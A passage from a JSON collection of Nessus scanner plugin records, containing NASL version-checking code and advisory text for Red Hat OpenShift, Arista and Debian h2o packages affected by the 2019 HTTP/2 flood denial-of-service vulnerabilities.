script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-efs-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-local-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-provisioner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-ovn-kubernetes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-alertmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-node-exporter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-promu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2769\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ansible-service-broker-1.1.20-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ansible-service-broker-container-scripts-1.1.20-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ansible-service-broker-selinux-1.1.20-2.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-redistributable-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-redistributable-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-cluster-capacity-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-cluster-capacity-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-descheduler-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-descheduler-3.9.13-2.git.267.bb59a3f.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-docker-excluder-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"atomic-openshift-docker-excluder-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-dockerregistry-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-dockerregistry-3.9.101-1.git.1.13625cf.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-excluder-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"atomic-openshift-excluder-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-federation-services-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-federation-services-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-master-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-master-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-node-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-node-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-node-problem-detector-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-node-problem-detector-3.9.13-2.git.167.5d6b0d4.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-pod-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-pod-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-sdn-ovs-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-sdn-ovs-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-service-catalog-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-service-catalog-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-template-service-broker-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-template-service-broker-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-tests-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-tests-3.9.101-1.git.0.150f595.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-web-console-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-web-console-3.9.101-1.git.1.601c6d2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cockpit-debuginfo-195-2.rhaos.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cockpit-kubernetes-195-2.rhaos.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"containernetworking-plugins-0.5.2-6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"containernetworking-plugins-debuginfo-0.5.2-6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-o-1.9.16-3.git858756d.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-o-debuginfo-1.9.16-3.git858756d.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-tools-1.0.0-6.rhaos3.9.git8e6013a.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-tools-debuginfo-1.0.0-6.rhaos3.9.git8e6013a.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-openshift-oauth-proxy-2.1-3.git885c9f40.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-openshift-prometheus-alert-buffer-0-3.gitceca8c1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-prometheus-promu-0-5.git85ceabc.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"hawkular-openshift-agent-1.2.2-3.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"heapster-1.3.0-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"image-inspector-2.1.3-2.el7\")) flag++;\n if (rpm_exists(rpm:\"openshift-enterprise-image-registry-3.8\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-enterprise-image-registry-3.8.0-2.git.216.b6b90bb.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-eventrouter-0.1-3.git5bd9251.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-eventrouter-debuginfo-0.1-3.git5bd9251.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-debuginfo-0.0.1-9.git78d6339.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-efs-provisioner-0.0.1-9.git78d6339.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-local-provisioner-0.0.1-9.git78d6339.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-snapshot-controller-0.0.1-9.git78d6339.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-external-storage-snapshot-provisioner-0.0.1-9.git78d6339.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-ovn-kubernetes-0.1.0-3.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-2.2.1-2.gitbc6058c.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-alertmanager-0.14.0-2.git30af4d0.el7\")) flag++;\n if (rpm_exists(rpm:\"prometheus-node-exporter-3.9\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-node-exporter-3.9.101-1.git.1.8295224.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-promu-0-5.git85ceabc.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ansible-service-broker / ansible-service-broker-container-scripts / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:16:22", "description": "The version of Arista Networks CloudVision Portal running on the remote device is affected by the following vulnerabilities:\n\n - HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service (DoS).\n An unauthenticated, remote attacker can exploit this, by sending continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. (CVE-2019-9512)\n\n - HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a DoS. An unauthenticated, remote attacker can open a number of streams and send an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both. (CVE-2019-9514)\n\n - HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a DoS. An unauthenticated, remote attacker can exploit this by sending a stream of SETTINGS frames to the peer.\n Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. (CVE-2019-9515)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. To retrieve patch level information this plugin requires the HTTP credentials of the web console.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-09T00:00:00", "type": "nessus", "title": "Arista Networks CloudVision Portal Multiple Vulnerabilities (SA0043)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514", "CVE-2019-9515"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:arista:cloudvision_portal"], "id": "ARISTA_CVP_SA0043.NASL", "href": "https://www.tenable.com/plugins/nessus/138340", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138340);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Arista Networks CloudVision Portal Multiple Vulnerabilities (SA0043)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Arista Networks CloudVision Portal running on the remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Arista Networks CloudVision Portal running on the remote device is affected by the following\nvulnerabilities:\n\n - HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service (DoS).\n An unauthenticated, remote attacker can exploit this, by sending continual pings to an HTTP/2 peer,\n causing the peer to build an internal queue of responses. Depending on how efficiently this data is\n queued, this can consume excess CPU, memory, or both. (CVE-2019-9512)\n\n - HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a DoS. An unauthenticated, \n remote attacker can open a number of streams and send an invalid request over each stream that should\n solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM\n frames, this can consume excess memory, CPU, or both. (CVE-2019-9514)\n\n - HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a DoS. An\n unauthenticated, remote attacker can exploit this by sending a stream of SETTINGS frames to the peer.\n Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS\n frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this\n can consume excess CPU, memory, or both. (CVE-2019-9515)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber. To retrieve patch level information this plugin requires the HTTP credentials of the web console.\");\n # https://www.arista.com/en/support/advisories-notices/security-advisories/8762-security-advisory-43\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5070013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the mitigation or upgrade to a fixed version as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arista:cloudvision_portal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"arista_cloudvision_portal_detect.nbin\");\n script_require_keys(\"installed_sw/Arista CloudVision Portal\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nport = get_http_port(default:443);\napp = 'Arista CloudVision Portal';\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'fixed_version':'2018.2.6', 'fixed_display':'2019.1.0' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:24:54", "description": "Three vulnerabilities were discovered in the HTTP/2 code of the H2O HTTP server, which could result in denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-08-27T00:00:00", "type": "nessus", "title": "Debian DSA-4508-1 : h2o - security update (Ping Flood) (Reset Flood) (Settings Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514", "CVE-2019-9515"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:h2o", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4508.NASL", "href": "https://www.tenable.com/plugins/nessus/128181", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4508. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128181);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\");\n script_xref(name:\"DSA\", value:\"4508\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Debian DSA-4508-1 : h2o - security update (Ping Flood) (Reset Flood) (Settings Flood)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Three vulnerabilities were discovered in the HTTP/2 code of the H2O\nHTTP server, which could result in denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/h2o\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/h2o\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4508\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the h2o packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2.2.5+dfsg2-2+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:h2o\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"h2o\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"h2o-doc\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libh2o-dev\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libh2o-dev-common\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libh2o-evloop-dev\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libh2o-evloop0.13\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libh2o0.13\", reference:\"2.2.5+dfsg2-2+deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:08:19", "description": "The version of Arista Networks EOS running on the remote device is affected by the following vulnerabilities:\n\n - HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service (DoS).\n An unauthenticated, remote attacker can exploit this, by sending continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. (CVE-2019-9512)\n\n - HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a DoS. An unauthenticated, remote attacker can open a number of streams and send an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both. (CVE-2019-9514)\n\n - HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a DoS. An unauthenticated, remote attacker can exploit this by sending a stream of SETTINGS frames to the peer.\n Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. (CVE-2019-9515)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-03-11T00:00:00", "type": "nessus", "title": "Arista Networks EOS Multiple Vulnerabilities (SA0043)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514", "CVE-2019-9515"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/o:arista:eos"], "id": "ARISTA_EOS_SA0043.NASL", "href": "https://www.tenable.com/plugins/nessus/134419", "sourceData": "#TRUSTED 9854d4a035645598d6d4a2bf77d33726ad7be07f9a2506ff2dea1bc45491e6cf84fd69657834f672d1d627b73ddf07257c6c246cca0fc7ef43e14882225df2f71ff56a05ac823d1666132d3f1329fb6632897dea66e8a225e5d5e1220e4dd5a35caf6a7fed6fc33e941387d2bafcdebf16734bad3e40dcbc4b3e9c808e0851f34fded1f8c4dc17d18a8b36d7a5825254cc98578421b91ed7e40ab2a91e4f6ac018fb09043f6c2a141ba8dea2f5399404e7198e093b29ac304120c0abf0278d26e646faeca81cb2a65c040427ecf56bf284e75a913e1dbc3e2bbca524df97fff9c3684ecfd1c6fdc96523d54886e2d5dc178f0db81b091a26bf8c9aa48d67cefe365b896cda4af6681c8efb39d19185c5f6ccb4b1279564df8a4b29fb6886fb20d291cfa0d49eb9db0830fd25944f9a39763d4369c41ece17232a8b689d17f81f7d22bbbcacdd2cc9b7cab1f09b74da94afe8eb28e9388681910d3f63986d0bf9e87b7ae582fe1f8241a7b64000183c9679f2fada022d064b355048e5dc35694b2b6986b6acfe6d30045ce40c6d50589b4c833eadeb133273f736df82a3925fb7393b14e654ebd7cc03ef3c2e93c287b52ed9fcd6de55c2b380c0b4313f83a73c16c27af8a2a9208573ac63f088fa817f223421bd610267d483040f56062c2602df526d65e7ff6f840309175c177d15681ed60a5af11d07435ae1deb172dbe663\n#TRUST-RSA-SHA256 